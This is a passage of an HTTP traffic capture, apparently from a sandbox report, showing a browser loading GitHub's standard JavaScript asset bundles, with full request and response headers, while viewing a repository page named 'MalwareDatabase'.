server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
age: 603086
x-served-by: cache-iad-kjyo7100126-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 56, 17985
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: abd10a352c389d0102d4c97b283327764e9f321b
content-length: 5490
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_github_auto-complete-element_dist_index_js-node_modules_github_details-d-ed9a97-3fb8ce186301.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_github_auto-complete-element_dist_index_js-node_modules_github_details-d-ed9a97-3fb8ce186301.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Mon, 26 Feb 2024 19:17:29 GMT
etag: 0x8DC36FF9311C578
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
age: 2127214
x-served-by: cache-iad-kcgs7200020-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 8, 43626
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 5fa3a55163b89ef2837036a3e80581b3546348ac
content-length: 5298
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_github_text-expander-element_dist_index_js-8a621df59e80.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_github_text-expander-element_dist_index_js-8a621df59e80.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Fri, 26 Jan 2024 14:37:34 GMT
etag: 0x8DC1E7C55AB5C06
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
age: 2262300
x-served-by: cache-iad-kjyo7100082-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 17, 43401
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: a2e736ebba971cd50ba320c4c4588a8e7bbd30fa
content-length: 4929
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_stacktrace-parser_dist_stack-443cd5-1ba4dbac454f.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_stacktrace-parser_dist_stack-443cd5-1ba4dbac454f.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Wed, 21 Feb 2024 14:59:32 GMT
etag: 0x8DC32EDB64771CB
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
age: 1953521
x-served-by: cache-iad-kcgs7200030-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 80, 44451
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: bd3f41059d4184e8b51a178a940a2031ff6006b1
content-length: 3685
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-b7d8f4-7dc906febe69.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-b7d8f4-7dc906febe69.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Mon, 08 Apr 2024 21:06:44 GMT
etag: 0x8DC580FCBA459C2
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
age: 3010280
x-served-by: cache-iad-kiad7000084-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 108, 44472
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: bbefa9aa613cdda00a9f119e47331006c1464ce2
content-length: 5939
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_primer_view-co-3959a9-28f0ee9fece0.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_primer_view-co-3959a9-28f0ee9fece0.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Tue, 12 Mar 2024 18:24:27 GMT
etag: 0x8DC42C1A6EBE6E7
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
age: 3134026
x-served-by: cache-iad-kiad7000125-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 11, 21995
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: b012a4abe9204b1797685abecee6f85fa74d7cbe
content-length: 3375
-
GEThttps://github.githubassets.com/assets/app_assets_modules_github_onfocus_ts-ui_packages_trusted-types-policies_policy_ts-ui_packages-6fe316-8ed7f869463a.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/app_assets_modules_github_onfocus_ts-ui_packages_trusted-types-policies_policy_ts-ui_packages-6fe316-8ed7f869463a.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Thu, 25 Apr 2024 10:51:15 GMT
etag: 0x8DC6515A15B19A3
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
age: 1582264
x-served-by: cache-iad-kcgs7200077-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 13, 42841
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: e4d010b1748676868fe845437debc59ea30600cb
content-length: 7892
-
Remote address:185.199.108.154:443RequestGET /assets/github-elements-f7fe73c93e30.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Wed, 10 Apr 2024 22:31:19 GMT
etag: 0x8DC59ADF159B0D5
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
age: 2686831
x-served-by: cache-iad-kjyo7100171-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 43, 44816
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: b99fb8392108dafa48bfe8c3d49be096e14b23ff
content-length: 7526
-
Remote address:185.199.108.154:443RequestGET /assets/element-registry-7a4a1ad7d028.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Wed, 21 Feb 2024 14:59:32 GMT
etag: 0x8DC32EDB672E4D1
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
age: 3143439
x-served-by: cache-iad-kiad7000141-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 95, 43913
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 9368ac6a42c8e9fa2c8afc34b2f526d240948a0c
content-length: 2409
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_github_catalyst_lib_index_js-node_modules_github_hydro-analytics-client_-4da1df-9de8d527f925.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_github_catalyst_lib_index_js-node_modules_github_hydro-analytics-client_-4da1df-9de8d527f925.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Wed, 10 Apr 2024 22:31:19 GMT
etag: 0x8DC59ADF18C47C9
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
age: 2686831
x-served-by: cache-iad-kcgs7200100-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 43, 44671
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: a14bb0a9b78d5bd6ff974961211220bd2ed59f24
content-length: 4197
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_braintree_browser-detection_dist_browser-detection_js-node_modules_githu-fd5530-6f4d94175afe.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_braintree_browser-detection_dist_browser-detection_js-node_modules_githu-fd5530-6f4d94175afe.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Mon, 06 May 2024 21:23:02 GMT
etag: 0x8DC6E12B67E3E17
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
age: 519858
x-served-by: cache-iad-kiad7000173-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 2, 15429
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 3c9404a0a8b0fc3a14ba0ba9b12c3be754857cfb
content-length: 5107
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-5b376145beff.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_lit-html_lit-html_js-5b376145beff.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Thu, 25 Apr 2024 16:40:22 GMT
etag: 0x8DC654666D07B00
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
age: 1224846
x-served-by: cache-iad-kjyo7100135-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 78, 7736
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: ed512ffcc9b86f006baeff3d67a71f90e7551145
content-length: 5612
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_morphdom_dist_morphdom-esm_js-node_modules_github_memoize_dist_esm_index_js-05801f7ca718.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_morphdom_dist_morphdom-esm_js-node_modules_github_memoize_dist_esm_index_js-05801f7ca718.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Fri, 23 Feb 2024 10:52:50 GMT
etag: 0x8DC345D9433CD2B
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
age: 2268524
x-served-by: cache-iad-kcgs7200178-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 8, 43434
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 0e7d8139db93819b3b32520784678db6fef4c503
content-length: 3974
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_github_turbo_dist_turbo_es2017-esm_js-c91f4ad18b62.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_github_turbo_dist_turbo_es2017-esm_js-c91f4ad18b62.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Wed, 13 Dec 2023 17:40:24 GMT
etag: 0x8DBFC029676217D
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
age: 3145361
x-served-by: cache-iad-kiad7000173-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 2887, 44935
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 6549a4ec0ec3c464a83a928155a24343e6b4a9bf
content-length: 21225
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-893f9f-a8ec7ed862cf.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-893f9f-a8ec7ed862cf.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Thu, 09 May 2024 15:58:35 GMT
etag: 0x8DC7040E2344D27
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
age: 331713
x-served-by: cache-iad-kjyo7100095-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 24, 1156
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 4050fa9dee9cc3d6be52ea2c7e522cbf05b9f8e4
content-length: 8261
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_scroll-anchoring_dist_scroll-anchoring_esm_js-node_modules_github_hotkey-1a1d91-d831c241f313.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_scroll-anchoring_dist_scroll-anchoring_esm_js-node_modules_github_hotkey-1a1d91-d831c241f313.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Mon, 06 May 2024 19:32:07 GMT
etag: 0x8DC6E03376BB766
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
age: 603086
x-served-by: cache-iad-kcgs7200117-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 56, 18166
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: ace690aaa5564e1ad0902b862405bcb9821af3e4
content-length: 10371
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-72c9fbde5ad4.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_color-convert_index_js-72c9fbde5ad4.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Tue, 06 Feb 2024 08:35:48 GMT
etag: 0x8DC26EE9E556F64
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
age: 2260046
x-served-by: cache-iad-kiad7000150-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 95, 44027
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: d7a7f090e58de8deb264646abeec1fdf65addb04
content-length: 4486
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-node_modules_github_jtml_lib_index_js-95b84ee6bc34.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-node_modules_github_jtml_lib_index_js-95b84ee6bc34.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Fri, 19 Apr 2024 16:15:51 GMT
etag: 0x8DC608BFBB88031
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
age: 873507
x-served-by: cache-iad-kcgs7200112-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 73, 7810
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: c249cca29f82ea9ea5d2cec744e4c4abbede5ac2
content-length: 6120
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_github_session-resume_dist_index_js-node_modules_primer_behaviors_dist_e-da6ec6-3f39339c9d98.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_github_session-resume_dist_index_js-node_modules_primer_behaviors_dist_e-da6ec6-3f39339c9d98.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Tue, 24 Oct 2023 17:57:35 GMT
etag: 0x8DBD4BAB41AC2C2
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
age: 2260046
x-served-by: cache-iad-kiad7000150-IAD, cache-lcy-eglc8600083-LCY
x-cache: MISS, HIT
x-cache-hits: 0, 43392
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 1e2d774de38a3f1cb696ac2d4082479fb556990d
content-length: 4293
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_github_quote-selection_dist_index_js-node_modules_github_textarea-autosi-9e0349-b0f4de5b992f.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_github_quote-selection_dist_index_js-node_modules_github_textarea-autosi-9e0349-b0f4de5b992f.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Tue, 07 May 2024 21:25:26 GMT
etag: 0x8DC6EDC36AA3721
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
